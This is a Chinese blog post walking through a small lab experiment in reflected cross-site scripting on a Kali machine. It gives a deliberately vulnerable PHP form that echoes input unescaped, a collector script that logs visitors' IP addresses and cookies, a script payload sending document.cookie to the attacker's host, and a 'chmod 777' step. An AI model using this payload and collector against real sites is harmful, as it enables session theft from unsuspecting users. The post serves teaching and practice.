跨站脚本攻击XSS (cross site scripting)--一个小实验

跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。

实验目的

进行一个xss跨站脚本攻击,获取目标的IP和Cookie信息。

实验环境

桥接模式下的KALI、物理机或者同NAT模式下的两台虚拟机

实验过程

1.在KALi的网站目录下创建两个php文件

       (1) submit.php

<?php
session_start();
?>
<!doctype html>
<html>
    <head>
        <title>XSS Demo</title>
    </head>
    <body>
    <form>
    <input style="width:300px;" type="text" name="address1" value="<?php echo $_GET["address1"]; ?>" />
            <input type="submit" value="submit" />
        </form>
    </body>
</html>

        (2)hack.php

<?php
$victim = 'XXS get the cookie:'. $_SERVER['REMOTE_ADDR']. ':' .$_GET['cookie'];
file_put_contents("1.txt", "$victim");
echo welcome;
?>

保存好放入/var/www/html目录下

2.进入网站提交恶意代码

 (1)打开kali的apache服务

service apache2 start

 (2)在网页测试一下是否开启服务也可以通过nmap扫描自己的端口判断

3.进入http://192.168.x.x/submit.php,在输入框中输入恶意的代码

(1)在此之前先修改一下浏览器的安全设置

        

(2)提交恶意代码

"/> <script>window.open("http://192.168.2.123/hack.php?cookie="+document.cookie);        </script><!--  

4.提交之后跳转进入hack.php

(1)到1.txt查看是否写入受害者的IP和Cookie

(2)这里并没有写入,分析原因:代码检查过了一遍没有问题,安全设置也设置了,那么可能的原因就是文件写入权限的问题。

(3)解决办法,打kali终端输入

cd /var/www/html    #进入网站目录

ls -ll               #查看文件权限

chmod 777 /var/www/html/1.txt      #修改1.txt文件的权限

这样写入问题解决。

5.打开1.txt文件查看到受害者的IP和Cookie信息

实验完毕

  • 4
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_AaRong_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值